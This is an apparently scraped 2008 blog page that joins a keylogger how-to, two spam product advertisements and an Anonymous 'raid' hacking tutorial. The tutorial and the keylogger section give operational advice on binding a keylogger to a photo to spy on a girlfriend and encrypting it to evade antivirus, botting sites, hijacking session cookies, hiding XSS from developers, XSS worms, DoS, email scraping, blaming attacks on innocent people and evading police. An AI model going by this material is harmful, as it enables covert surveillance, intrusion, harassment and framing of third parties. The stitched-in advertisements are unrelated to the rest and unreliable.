although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers

Stylish Prescription Glasses

Posted at Monday, August 04, 2008

Are you looking for affordable eyeglasses? Now there is incredible stylish new frames from Zenni through website ZenniOptical.com. This online shopping offers huge selection of frames, with single vision lens, sunsensor (potochromic)lens, tinted sunglasses lens, bifocal lens and progressive lens. Choose from a variety of high quality complete eyeglass such as Zenni Optical $ 8 Rx Eyeglasses. ZenniOptical.com provides qualified stylish prescription glasses and durability guarantee. Zenni Optical was on FOX news! Consumer reporter Melissa Painter looks into whether its products are a Deal or a Dud. What are you waiting for? visit ZenniOptical.com and get your stylish eyeglass now.

Gift Buying Guides

Posted at Monday, August 04, 2008

Rightnow if you want to presents the gift for your family or your relations, there is easy way to buy through the web at ShopWiki.co.uk. This online shopping offers gift buying guides for people so they can choose the right gift suitable their wish. The gift buying guides split up into two groups by recipient and by occasion where you can click each link which you want. For by recipient there are some the links such as Gifts for Women, Gifts for Men, Gifts for Dads, Gifts for Grandparents, Gifts for Wives and etc. Whereas for by occasion there are some the links such as Anniversary Gifts, Wedding Gifts, Party Gifts, and many more.

Each of the links be found a few sentence where illustrate about the means of the link. For example, the link Gifts for Women, here illustrate how women can be complicated at times, and buying one a gift can be extremely intimidating. Before you get discouraged, know that there are myriad ways to choose the perfect gift for your mother, daughter, sister, girlfriend, wife or friend, and remember that it's her interests that count most. Listen to her dislikes and likes, and take note of her personal style. So, if you are looking for the gift, don't confuse just visit ShopWiki.co.uk, all your need available here.

A Complete Hacking Tutorial

Posted at Monday, July 28, 2008

A Complete Hacking Tutorial

Anonymous guide on how to be a /h4ck/er on steroids.

---> Read this file top-to-bottom

•••Preliminary•••••••••••••••••
••••What•this•guide•is•••••••••
••••What•this•guide•isn't••••••
••••Target•Auidence••••••••••••
•••Programming•••••••••••••••••
•••Rules•and•Protips•••••••••••
••••/i/nsurgent•protips••••••••
••••/h4ck/er•protips•••••••••••
•••Professions•••••••••••••••••
•••Basics•••••••••••••••••••••
••••How•Computers•Work•••••••••
•••••Languages•Control•All•••••
••••Networking•Basics••••••••••
•••••IP•Addresses••••••••••••••
•••••TCP/IP••••••••••••••••••••
•••Raiding•9001••••••••••••••••
••••Websites•••••••••••••••••••
•••••HTTP•Botting••••••••••••••
•••••Session•Hijacking•••••••••
•••••XSS•••••••••••••••••••••••
•••••Breaking•Captcha••••••••••
•••••Phishing••••••••••••••••••
•••••DoS•••••••••••••••••••••••
••••••Weak•Spots•••••••••••••••
•••••R00ting•••••••••••••••••••
•••••Stealing•Information••••••
•••Resources•••••••••••••••••••
••••Tools••••••••••••••••••••••
••••Links••••••••••••••••••••••
••••Reference••••••••••••••••••
•••Closure•••••••••••••••••••••
•••••••••••••••••••••••••••••••


TODO:
Create a long list of keywords to learn
add how to cover tracks
Raiding 9001
-cover exploits regarding php/.net/j2ee/old CGI (c/perl)
*j2ee developed applications are pretty secure, but definetly cover this
*note to newfags: the extension doesn't garauntee what the platform it was
developed on. j2ee rarely ends in .jsp because the servlet usually forwards
to its context root "domain-url/Example" instead of "domain-url/example.jsp".

•••Preliminary•••••••••••••••••
Anyone can pick up and write to this file, don't drop names into it otherwise
it'll just get sage bombed. Any edits you put into there, submit to a new
thread and let ppl in /h4ck/ go over it to make sure it isn't wrong/or just
stupid.

••••What•this•guide•is•••••••••
-How to help an /i/nsurgency using techincal expertise
-Again, how to help an /i/nsurgency as opposed to personal vendettas
-Again, HOW TO FUCKING RAID teh internet, so its focused on websites
-if the terms like "lurk moar" for example confuse you, then this guide
won't help you, try:
http://www.google.com/search?q=%22how+to...2&ie=utf-8

PROTIP: If any links are broken, learn to waybackmachine/google.


••••What•this•guide•isn't••••••
-hOW tO bE a HaCkEr
-rooting. This is not another how to root guide but it will cover that for
newfags. Rooting != win. rooting will last for 2-8 hours. A well thought out
attack causes days worth of damage in data lost, and weeks of labor lost.
-any words like script kiddies or any other retarded shit you will hear people
on blogs/digg/fag dominion talking about. Funny how the biggest namefags
who love to talk about hacking the most 1) rarely hack or 2) never hack.
Its also funny how the later of the two write 90% more than the prior of the 2
-linux based. linux != hacking. knowing linux is helpful if u want to hack into
linux boxes. You have probably read other guides and noticed how they keep
reiterating that you must somehow use only or be a linux guru in order to hack.
That is just incorrect, however you will need to know some how to use linux
and be rather profecient in it as it would be pretty fail to not know linux,
then hack into a linux box using some script and then not know what the fuck to
do.



••••Target•Auidence••••••••••••
-if gb2/gaia, gb2/bed, or yiff in hell offends you, kill yourself. Anyone who
is a weaboo fag or jerks off to furry shit clearly doesn't have the capacity
to hold a non-remedial job let alone utilize techincal expertise.
-you need to be able to program, if you can't, then refer to the paragraph below.
-we are a legion of h4ckers, many of us are IT
proffesionals/comp sci students (in b4 CS III).
You'll probably end up on that path anyway, why
learn to program then not make good money at an ez
job am i rite? YOU THERE. WHAT IS YOUR PROFESSION?
-If you want to know the answer to "I have an IP what can I do with it"
this means that you don't understand computers very well
and need to learn some more before you attempt to give
out any expertise... Read the next paragraph and after
you do some learnin come back. You'll need to keep reading
shit and never stop... try to spend as much time on your
learnins as you have put into your faggot MMOs? Also
skip to the Basic section and read that before you program.



•••Programming•••••••••••••••••

if (!notProgrammer || (pLangauges.size == 1 && pLanguages.next() == "php")
|| shitpilenewb) {
If you can't program you will never know shit. You won't understand how any
exploit which you prolly /r/ but don't even fucking know why. l2/program and
LEARN IT GOOD + you will never stop coding once you do. When you see exploits
being mentioned, in the back of your mind you will understand exactly what it is
doing and how it works. Understanding and after that, knowing, IS THE EPITOMY OF
HACKING. You will never know shit unless you learn how computers work.

~^~
Learn a non interpreted language first. Rather, just learn C or C++, Java.
These languages are turned directly into machine code, which is then fed to
the CPU as opposed to a script, which is interpreted by a program. You will
need to learn about the stack, and other common programming topics so get a
good book. If you really want to be good, learn ASSEMBLY and learn how C/C++
is converted to assembly. Remember this:

High level language -> Intermediate language -> Machine code
an example:
C -> Assembly -> 01001010 <-instruction
i++ -> INC [i] -> 01001010 10001010 <- EXAMPLE,was too lazy to refer to *correct*
opcode so don't be a wise ass if you did refer and found the 0's and 1's were
completely wrong, because they just an example and I'm lazy.

Java works differently, yet you will prolly learn it in college. VB is not
helpful, it isn't like other high level languages. Do not learn it.

protip: c#, Ruby on Rails, J2EE and php will not help you learn computers/how to
program anything good. They are highly detailed in helping developers create web
applications. If the idea of *creating* a web game or forum interests you then
learn these as they will automize and make a lot of the programming required for
web development easy. Learn these afterwards though they are needed to
understand how web applications work.

~^~
WHAT THE BOOKS WONT TELL YOU YET WHAT IS MORE IMPORTANT:
-It is all about source code. You learn from source code. After you get the
basics down just google '"source code"+language'. Look at any programs that
interest you. basically, Read a little, write a little, REPEAT. This is what we
all do, no matter skill level.
-Every language has a common library for handling Strings, threads, etc. Some
pretty common code. You WILL need to know this just as good as the syntax so
quickly find the API reference for these. Fuck it here they are lulz:
http://java.sun.com/j2se/1.5.0/docs/api/ - java obviously
http://www.cplusplus.com/reference/ -c++
-LEARN TO FUCKING GOOGLE! This isn't because you annoy others, if anything ppl
enjoy strobing their e-peen to help you. But, listen. As paid software dev
I, and everyone of us google shit at work. Why? Because when you are a
programmer you REUSE code, and you want to find other libraries which already
work well and are very extensive. Whenever you get an error, type it into
google and you will get information pertaining to it.
-Only reason I recomend books is because they SHOULD tell you about the stack
and how computers work in general.

After you have read all of that, can you write a program that visits a webpage,
grabs all of the links there, and visits one of the pages in there? Then steal
all the emails in the page (as it looks for links). Then code it so that it
scans for forms and logs wether or not it found one and what the url was. If
you didn't write good functions (modular code) you still need to learn that or
else you won't be a good coder. Once you have this project up and running, and
can easily make changes (ie: easily add new functionality) to it then you can
move on.

Oh, and one more challenge: learn what the stack is, and then read this and
attempt to understand what a buffer overflow exploit is. These are very common:
http://www.cs.wright.edu/~tkprasad/cours...phOne.html

hint on what stack you want to read about:
http://en.wikipedia.org/wiki/Stack_(data_structure)#Hardware_stacks
^as not to confuse you with the abstract data structure.
Of course, if you choose java you still need to learn pointers.

So, finish both challenges before you can move on. DO IT FAGGOT!

tl;dr: learn java or c, then assembly and then stick to those for a while

} else {
so you can program? doesn't mean jack. You need be able to think creatively.
You need to know the "time of day", (hint: its always RAPE). Knowing what to
program is what you need to focus on no matter your skill level.

Other languages and stuff to learn:
Because we hit websites so much, you need to learn HTML and some
javascript, and css. Any other programming languages will be very similar
and learning them should only take 2-4 days. You should also understand TCP/IP
basics, proxies, socks, and HTTP is very important. Also learn binary (its a
number system, just like decimal... also learn hex, again an number system, not
something that you edit with a hex editor).
}



•••Rules•and•Protips•••••••••••
••••Rules••••••••••••••••••••• •

1) Do not namefag. Do not trust namefags. You need 7 proxies, but you'll need
9001 handles. Use a new handle AND proxy often. An internet handle is
as good as your FULL NAME and DOB once they do find your indentity. Going
around putting your handle in sploits or coding a bot then posting the link
in the channel with the SAME name over and over means you're a fucking
retard. WE ARE FUCKING CALLED ANONYMOUS FOR A REASON.
2) MODS = FAGS. This applies to ircops and channel ops. Do not "work your way
up" the hiearchy (hence don't namefag). I don't have anything against
these people other than their general name faggotry. We found out the owner
of partyvan IS A G-A-I-A FAG during a raid. Don't trust mods and nevar trust
a namefag.
3) Contribute solutions with the goal of "Getting the job done". Raids need
coders. Some of it it common shit like a bot that spams shit on forums or w/e
messaging. The idea is to take the best strategical course of action. Find or
start a project which will either result in absolute lulz or rape (hence
"whatever works, whatever gets it done"). The idea is to maximize rape, not
grow an e-peen. If you don't be a namefag then growing an e-peen won't
factor in, and you'll understand how important contributing is.

••••/i/nsurgent•protips••••••••

*) Switch your name often, you are anonymous. If you want attention or have some
other pyschological needs you can join g00ns. Nothing against them but they
will offer you what you want so that you don't douse decent lulz worthy raids
with your general faggotry.

*) Proxy now instead of later. Even though no shit will happen to you by just
entering a channel if you later decide to do something illegal, then keep the
same fucking name you logged in with that links to your ip, which your ISP
will be able to link to your SUBSCRIBER ACCOUNT/BILLING ADDRESS then yeah,
you're a faggot and deserve jail raep.

*) Contribute and post screen shots on teh chans + talk some. If anyone kicks
you, show them your screen shots of lulz.

*) You do not need to be an ircfag. Ideally you wouldn't be lurking there at
all and all of your work should be posted to boards but the irc is
effecient. Would be very hard to talk, collaborate and have good intel on a
chan.

*) Do not worry about "working your way up the irc channels/mods." Infact, you
shouldn't be doing that at all. If you are looking for social
interaction/importance then gb2/gaia. Also, if you are from gaia or are just
a fag in general and are looking into this because you think it's "trendy",
you will be doxed in matter of time, could be as soon as a week, or later in
a month, 3 months, eventually, if you don't gb2/gaia and stay there.


••••/h4ck/er•protips•••••••••••

If you think rooting = the ultimate hack then you're a shitpile n00b. If
you want to make an impact, and lulz over what a group, communitty (fags) and
company had to put up with from what you did with your keyboard then this
guide is for you. Also, this isn't a pissing contest. Nobody gives a shit about
how good you may or may not be. Also if you are anonymous, this wouldn't apply
because in effect, you don't exist, but your work does.

*) Blame it on a namefag. Anything you write, claim credit for it, using
someone elses name. Party van tracks us the same way we dox faggots:
tracing aliases is step #1. Afraid that your exploit will cause enough
monetary damage to warrant an FBI investigation? Hop onto the partyvan irc
find a random namefag there and blame it him for teh lulz.

*) Do collaborate with other h4ckers and learn from them. Share source code at
your own descretion. Also you can offer help if you know a lot about a
particular field (ie: if its your irl job or something you happen to know
the ins-and-outs of).

*) Learn how to hide your tracks and the internet fucking works before you
start talking, let alone doing anything illegal. Learn how proxies do
give you secruity, yet can be compromised. Learn how Tor works.

*) Don't read from white hat websites. These are shitpile havens for idiots.
The problem with most people is that they want to appear smart, but only for
the sake for impressing others. Most of their shit is later proven wrong (as
it eventually has to be since they go around informing too many shitpile
noobs who believe everything at face value and can't fucking learn how to
filter out noise-to-content). Most of the websites are making money off of
adsense, if that helps you at all. DO ORIGINAL FUCKING RESEARCH AND TEST YOUR
OWN WORK AND IF YOU CANT LEARN HOW TO FILTER OUT SHIT FROM GOOD THEN YOU WILL
NOT GET ANYWHERE.


•••Professions•••••••••••••••••

People are only good at what interests them so pick one or several you like.
Someone else can flesh out moar professions here. Again, profession != skill.
Skill is up to you and your creativity. A simple programmer can beat out a
software engineer if he is more creative.

Programmer
\
\
Software Engineer
|
|
Vxer

Programmer
-Understands a programming language, hopefully C or Java
-Can help with writting some tools, but fails to understand how to
code some things or needs help.
-Can read source code of tools and understand them
-Should be reading a lot of source code to become better

Software Engineer
-Able to create tools for raids. Very helpful, somewhat common
-Able to find simpler exploits, such as XSS
-Able to exploit the already discovered

VXer
-Highest level of Coder, a virus writer/GOD
-Knows Assembly very well. Works from the lowest level, most difficult.
-Able to reverse engineer software and discover trade secrets and exploits
-Can discover software exploits well/buffer overflows/good ones
-rare to non-existent. Needed, but most difficult.

This is just to give you an idea of whats out there. This is in no way some
kind of theory or application.



•••Basics•••••••••••••••••••••� �

At this point everyone knows how to program. Don't be concerned if you are new
and you still have more questions. This part of the guide will be the last to
teach and cover basics. Often times the problem in /h4ck/ is that there are
questions from noobs who just don't know computers or networks work in general.
Knowing how to program is the only way to understand how computers AND networks
actually work. There are some basics that are needed to be covered.


••••How•Computers•Work•••••••••

If you are really new, just google it and read a simpler guide b4 reading this.

Everything occurs at the CPU, essentially. And it is sequential; one at a time.
NOTHING on your computer runs simultaneously, even on dual processing because
one of those CPU's has to wait for the other to finish :P. It's simply breaking
up what one CPU would have done anyway, ONLY IF the programmer designed it for
duo core (threading according to that architecture). Often times you can hit
ctrl + alt + del and see a process like a game consuming 50% of your CPU
because that game, like most every other program to date isn't designed for duo
core. ANYWAY, back on subject:

Everything in the computer occurs in steps of finite time, ONE by ONE. This
time is known as the system clock, which runs at a certain Mhz. Let's say its
133Mhz. However the CPU runs faster, yet on the same clock speed. How? It runs,
as set in the BIOS (check yourself), at a multiplication factor of the system
clock. So say it runs at 9x (system clock), or 9 x 133Mhz = 1297 or 1.3 Ghz. So
the CPU can do 9 operations before System bus (which runs at the speed of the
system clock) will be accessed (if needed) to get something from RAM, an HDD, or
a device. As a computer user, the only thing you ever do on a computer is play
around with the CPU, using an application to do this for you. THE CPU then
reads/writes to every thing else in the computer... the CPU controls the rest of
the computer. As a programmer you control the CPU much more closer. Obviously
you can't do shit on a computer if you don't understand it, and you can see
where programming comes in as a need to know. Also, multiple programs ONLY seem
to run on a computer simultaneously, but they are, in reality, being given a
small fraction of time to run, in a priority queue, then kicked off the CPU by
he OS's CPU scheduler, given to the next process in line. For the noob,
process = program. Program = simple user level talk.

The goal of any hack is to get access to the CPU essentially. Obviously root or
and admin account would be prime access to run the best applications BUT if you
can inject your own code in there during a user session (often called shell code)
to give you such an account or higher level system privelage then you are in.


•••••Languages•Control•All•••••

A non-interpreted language is compiled directly into executable objects. These
are files, often in a particular OS format (Like PE Format for windows). Within
this format will be the .text session which contains all of the CPU
instructions. This object file, like a .exe on windows, is loaded and given its
own id and the CPU scheduler determines when it will be loaded in. System
processes are given higher priority, but they pretty much take turn. Windows
uses a 32 priority queues. The top 16 belong to system processes. The secheduler
starts with the highest number queue and works its way down until it finds a
process that needs to run (its status will be set to waiting, as in its waiting
to be ran on the CPU.) Otherwise its status will be blocked and it won't run
on the CPU because it doesn't need to. Also it could be waiting for I/O, which
is relatively VERY slow compared to the CPU. This is where multi-threading
comes in. One thread will do I/O so that the entire process isn't blocked. This
is how a good DoS tool works too, so that it doesn't do 1 crapy request at a
time, but uses many threads for each I/O.

The only way you will do anything on a computer is through a process. If you
can't write processes, or engineer your own code into one (buffer overflow),
then how you can ever claim to be a hacker? There is no flashy program that
"hacks", or even a command line tool. And linux has nothing to do with hacking
other than the fact you need to know what the fuck to do on a linux box provided
you get into one. Would be pretty fail if you get in but have no clue as to
what to do. And an OS is all code just the very same way a process is, save
for the fact that it is the process which is originally loaded, and takes
complete control over all of the computer and only allows other processes to
run on time-shares.

As a hacker you will always need to do something tailored to your needs, there
is no already precompiled solution for everything. And why wouldn't you prefer
your own control over the computer instead of an application? Users are forced
to use applications in order to get the computer to do what they need. A hacker
forces the computer to do what he/she wants it do do based on his/her wants.
Of course you are never to re-invent the wheel if what you are doing is
sufficient to something else already done, however often times the task at hand
holds intricate requirements. For example if you're installing a virus on a
machine that you want to it to initiate a DoS at a certain time (maybe
whitehouse.gov? :S), you should definetly use a module somewhere already written
for that, provided it doesn't trip any AV. No point to re-write something so
simple and obviously something incribly modular like that.


••••Networking•Basics••••••••••

Protip: A server is a process running on a *PORT*. The service running on that
port is a server. Colluiqally a server is a machine, techincally it is a
service that a client connects to.

Basically, it is just: computers running routing software (aka: A ROUTER!) +
DNS lol.

The internet is a network of networks, interconnected at certain high volume
areas. If you and your neighbor are on the same ISP then when you connect to
his pc for a game or w/e then you only hop to routers located within that
network. Subsequantialy your traffic will never leave that town. However if the
same neighbor was using a different ISP your traffic would prolly be routed to
DC, New York, LA, Atlanta, etc some major city where the two ISPs can be
traversed there.


•••••IP•Addresses••••••••••••••

Again, the internet is a network of networks. These networks are inter-connected
(hence internet!) via routers. Networks like universites and ISPs, which then
are routed to much larger networks like level3 for example. The way an IP
address works is yes it is like the "virtual address" of your computer. But
here's whats worth noting... An IP address is routed (obviously by routers) to
its destination based on the IP number itself, and of course the router's
following of TCP/IP (using routing tables).

Certain organizations are granted blocks of IP addresses, for example Havard
was granted the entire 128.xxx.xxx.xxx (class A) block awhile ago. This
obviously isn't done anymore. Routers will forward packets based on the
destinatino IP address until it gets closer and closer. Examining the class
A.B.C.D needed. Techincally you can setup your own home network and give your
machines whatever IP you want, packets will be forwarded based on your routers
tables. Obviously this network and its current configuration will never be
asked by any other admin from another network if they want to connect the two.

A LAN, still running on the same TCP/IP protocol that the internet uses will be
use internal IP addresses to route its traffic. These IP addresses are in the
format of 192.168.x.x. These do not and are not routble on the internet, they
are reserve to route to local area networks. So yes, behind a network when you
want to connect to something like 192.168.1.2 you might connect to a printer
setup on your home network (if your printer is configured to be accessable over
the network, and obviously it will be physically connected to a router...). Most
people are given a router/modem combo from their ISP, thus this paragraph
explains why your IP address appears to be 192.168.x.x instead of whatismyip.com
will tell you (which is the external IP address of your router). It's internal
IP address will be in the format of 192.168.x.x. Learn more about ARP to get the
full picture.


•••••TCP/IP••••••••••••••••••••

TCP/IP is a suite of protocols. Keep that in mind. It encompasses ones you have
most likely heard of: TCP, UDP and IP. Also, IP Address = part of the IP
protocol; they follow it and pertain to the rules. Routers do the same so that
they can read IP Addresses and forward them correctly.

Read a book on TCP/IP. You can sorta skip the ISO network stack and focus on
TCP/IP part. Basically, the tl;dr version:

[Phyiscal layer][Link Layer][Network Layer][Transport Layer][Application Layer]
This describes how data is sent in packets. Each packet has the following
layers. Each layer is built in order for each part of the network to forward it
to its destination. These layers break up the packet, since it is just data,
hence why its called a datagram. Each layer is added by the appropriate
software.


Now to explain the layers in the order that they are *READ*:

Physical Layer - This layer is read by equipment that telecom companies operate.
Like switches, trunks and other boxes in CO stations. We don't really delve into
this here :S

Link Layer - Typically This is used for how data is transmitted over an ethernet
cable. Router can read this, use the MAC address (every device connected to a
network has a MAC address, not just NIC cards). This layer contains the MAC
address.

Network Layer - This is THE IP layer. It contains the destination IP address and
source IP address (your IP address). This is what routers will read in order to
forward your packet over the internet). They will read and replace each Link
Layer inorder to forward them to a the next router, but while any packet is on
the internet, this packet is not replace, but it is definetly read at each
router. Again, IP Address = THE TCP/IP protocol. Rather, one of the

Transport Layer - Typically either TCP or UDP. This layer contains information
relevant to the connection. This layer contains the port number, and is only
needed to be read at the destination's machine TCP/IP software. However "deep
packet inspection" can read this, as well as NAT-routers which have to read it.
Anyway, TCP is the connection based protocol, UDP is completely connectionless
alone, unless the application simulates a connection using its own rules. Just
read over these two in a book, you'll get the complete understanding + PICTURES.

Application Layer - The application layer is JUST data for the program that uses
the said connection. This data is the content of the connection. The application
writes whatever it wants to to this stream and reads all content from it just as
though the two weren't connected to the internet. This is how the Layer approach
strictly divides and SEPERATES data so that things run smoothy and simply.



•••Raiding•9001••••••••••••••••
Internet Hate Machine + techincal expertise = ???

Most likely a website raid. This is not a PA how to hack your ex-gf/stalked
victim's PC. You prolly don't even have the capactiy to do such anyway :S
But that doesn't mean PC hacking is off limits. If you can hack a website's
webmasters, developers or mods PC and procude MUCH lulz. The sky's the limit,
after all... so nothing is off limits, ever. As an /i/nsurgency we focus on
websites, so keep that in mind.


••••Websites•••••••••••••••••••

The target is not a web server. The target is the target and anything related
to said target. This includes the web server, the staff, the communitty. Also,
rooting != the end all win, not by a long shot. It will last for a couple of
hours and be patched up, but none the less its pretty win pyschologically. The
goal is to cause as much damage as possible, rooting can be done, but it is
garuenteed that there are other more actions that will cause much more damage,
and lulz than an attack lasting only for a couple of hours.

You will really need to know some basic TCP/IP, completly know HTTP and know
HTML, and some basic javascript. The js is to help your emulate incase the
js is redirecting or modifying something that will end up in a POST request
AND for XSS obviously.


•••••HTTP•Botting••••••••••••••

Highly effective against online communitties. These drive the owners, members
and devs fucking crazy, costs them a lot of money, and is a constant annoyence.
From viewing Moderator forums that a fellow anon hacked in, it was seen that
the devs and mods f-u-c-k-i-n-g hate bots. So, when raiding, BOT every thing
you can. Always bot the content reporting systems to fuck their ability to
report shit up! They will respond with adding a captcha = also win. Then move
onto other things, such as their forum, and whatever else can be spammed.
Be sure to write RE-USABLE code so that when you from one system to the next,
you can write each spammer (which is an HTTP Bot) quickly and easily. Hint:
Use object oriented programming, and have an HTTP Bot class which can be
extended easily.

The steps to botting are fun and simple. Also, provided there is not a very
complex CAPTCHA, YOU CAN BOT ANYTHING. As long as your browser can do it, you
can bot it. Because botting is just emulating your browser. If you ever run into
a problem its because you are not emulating the web browser closely enough. Also
allow all of your bots to use tor or some other user specified proxy.

0) Learn HTTP. Read up on this protocol, you'll learn a lot of need-to-know shit

1) Emulating the target service. Run IE, clear cookies (because your bot prolly
won't save cookies once it closes (it will save them and use them of course),
and of course, your bot will not initially have any cookies the first run
anyway. Now run Fiddler2. Examine the request and responder headers. Ignore
any SSL (port 445), images, css. But take note of HTML and JS. Don't read the
HTML lol, just copy and paste it into a new .html file on your computer to
quickly view it or use Fiddler2's integrated browser. SAVE this for later use.

2) Now that you have mapped out the details, begin coding. You'll want emulate
any POST requests, find the post parameters and anything in the query string.
This is how u emulate your requests. Also try to copy certain HTTP request
headers, like referer, user agent, and the one that says "Form encoded" is
imporant. However, you should be using something like Mechanize (for perl), or
Apache Common's HTTP Client (for java). Something which takes care of handling
cookies and emulating a lot of the browser. You won't need to set a lot of those
headers because you need to use something like the prior mention to do that for
you.

3) Run your bot, but set your program to use an HTTP Proxy, running on port
8888. This is fiddler2, you'll want it to connect thru that so it can read your
bot. Than compare this with your saved copy and see where you are not emulating
correctly.

4) Maintenance - If the target website changes something to break your bot, you
will want to use fiddler to see where you bot doesn't correctly mimic IE, by
comparing the two Fiddler sessions (1 from IE, and 1 from your bot). Otherwise
if they added a CAPTCHA you win. Next would be breaking the captcha OR writing a
tool which automates captchas so a fellow /b/tard can solve them to produce lulz
Ideally if you can write this as a web app so ppl can just visit the web site
instead of d/l something that would be pretty win. But CAPTCHAs are becoming
broken more and more every day so look into that.

5) This isn't the fitth step but, rather a note. You will want your bots to be
multithreaded. If they aren't they will only be able to spam one at a time. If
they are multi-threaded, you can load several accounts in at a time.

Finally you will want to create an auto captcha program. This will bot targets
user registration system and allow you to only enter 1 captcha to create a
program. Eventually the target might start to check that client isn't running
a proxy on port 80, or port 8080. As well as begin ip b& automatically after
a certain number of registrations. In this event, you will need to have a LARGE
list of GOOD proxies that you can server up on a web server so that your
spammer programs can call this list and get a fresh proxy server. You can use
a combination of web spiders and wget to build your own proxy list. Also at
the time of this writing, there is a current anon project related to just this.
Hopefully it will be up indefinetly.


•••••Session•Hijacking•••••••••

-grab cookies
-simple take all cookies (just a string), and use Modify Header firefox
extension to login as victim


•••••XSS••••••••••••••••••••� �••
-XSS basics
-make sure to hide xss from devs
*Do not ever submit xss in the form of Alert("whatever"). any user/dev will
find this and fix it. Use a combination of grease monkey/FIrebug to set
arbitrary DOM objects to arbitrary values that you can test are set. Refer to
tools at bottom of this file.
-XSS worms
*an xss worm is one that uses JS to redploy itself. EX:
Take a social networking website that has an xss exploit:
The exploit allows the attacker to run whatever javascript they want to. so,
if they use JS to direct their browser to send a message to someone, or they
implant the js into their profile it will spread like a virus. Then give it
a timed or triggered payload and BAM, CP on everyone's profile page!


•••••Breaking•Captcha••••••••••

-Some captchas = shit
-others are good, like google (yet all are breakable)


-Use erosion to filter noise (eats away pixels with little density)
-convert to binary image (black and white only)
-segment (pull each letter out)
-if the words are complete words, use dictionary.com (open an http socket
obviously...) to improve accuracy.


•••••Phishing••••••••••••••••••
-use previously written spammers on target website to profiferate links.


•••••DoS••••••••••••••••••••� �••
Really need GOOD information on DoS. A lot of retarded shit out there.


•••••••Weak•Spots•••••••••••••••
Weak spots to focus on besides just Bandwidth and network software.
ex: searches can tap the CPU harder.
weaklest link theory: The is a bottleneck somewhere. Find it and exploit that
area. If attacking hit the weakest area, thats fundamental to every attack,
so it goes with DoS too. There are people whose job it is to tie up these
weak areas. This part of text file needs to go over how to find them.
Like with teh subeta raid, and how they used the forgot email service.


•••••R00ting•••••••••••••••••••
Need a good guide on this


•••••Stealing•Information••••••
Using wget to steal thousands of yahoo emails and any other
infromation to spider-bot out of them.



•••Resources•••••••••••••••••••

For the shitpile noob: NO THERE ARE NO FLASHING PROGRAMS THAT HACK SHIT. THERE
ARE NO COMMAND LINE PROGRAMS THAT WILL HACK SHIT LIKE FROM WHAT YOU HAVE SEEN
IN A MOVIE. YOU HAVE TO ENGINEER SHIT, THESE TOOLS ARE FOR ENGINEERING.

Also, the /h4ck/ board should be a good resource if you can initiate a good and,
thought provoking conversation about something you have questions on but just
don't get from what google tells. Sometimes the answers are out there but they
are too good to be simply found on google + too many idiots have websites that
can really create a high noise to content ratio, making any good infomration
very well hidden. Plus anything you ask which is good can be seen for others
who hopefully had the same question, even someone more expereince may brush up
on a certain topic posted. But, do not ask stupid shit pile questions like
"what can I do with an IP," or ANY windows support questions. Support type
questions like "how do i configure [hacking related tool] to do ______" are
fine.


••••Tools••••••••••••••••••••• •
Fiddler2:
Great HTTP Debugger (the best + free too). It runs as a local HTTP Proxy in
so that it can read your http connection. This is completely transparent and
your connection is no different, other than the fact that you can read it as
well as decrypt HTTPS connections that you normally wouldn't be able to. Your
browser will give you a certificate warning. To use this HTTP Proxy with FF and
more importantly any http Bots that you write you will need to configure them
to connect to an HTTP proxy running on port 8888.

Firefox Addons:
Modify Headers:
You can use this to modifiy the "Cookie" header if you steal someone's cookies
from a login based website and you want to login to that session.

Firebug:
Find the DOM inspector. Also, lots of helpful tools that are needed. A personal
trick of mine for finding XSS is to have the JS set some random object you see
in DOM to something like 555, then use Grease Monkey to check if that value is
equal to 555 and have your greasemonkey script do an alert("XSS found"). BECAUSE
YOU DO NOT WANT THE ENEMY DEVS TO FIND YOUR XSS.

http://www.checker.freeproxy.ru/checker/index.php:
Proxy Checker


••••Links••••••••••••••••••••• •

The following links have been checked and cleared for not containing stupid
shit. That is, you will not become more of a retard by visiting these websites,
unlike certain websites. Whats worse than not knowing is thinking that you know
something, having spent time learning it, and just being a fucking retard for
having believed it at face value and been spoon fed utter crap, then sharing it
and passing it on as "real inforomation" to others. So, here be good links,
don't edit in links from crap websites with utter shit:



http://vx.netlux.org/
Great website for VX scene. rather, the only one lulz.

http://vx.netlux.org/lib/static/vdat/ezines1.htm
mostly old zines, but some good reads

http://www.textfiles.com/
again old, but might as well go over some history

http://www.phrack.com/
http://img.7chan.org/pr/



••••Reference••••••••••••••••••

http://www.googleguide.com/advanced_oper...rence.html
Very useful reference.







•••Closure•••••••••••••••••••••

Last tips to reiterate:
-you must know how computers/networking work. You must learn how to program
for that to happen since OS = software. What you want to hack = software.
-stop reading white hat websites for any information. Do your own research.
-do not work your way up the irc. MODS = FAGS
-stay the fuck anonymous.


In the end, Anonymous is for hackers, other than solo. The two just fucking go together. Don't
ruin it with namefagging and don't ruin your life in jail because you made a
mistake. Party van dox people just like we do... start with a screen name. But they
have access to much better infos than we do.
As for the party van... and all other namefags who write disclaimers regarding
their text file as being for educational purposes only: Fuck em.
We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.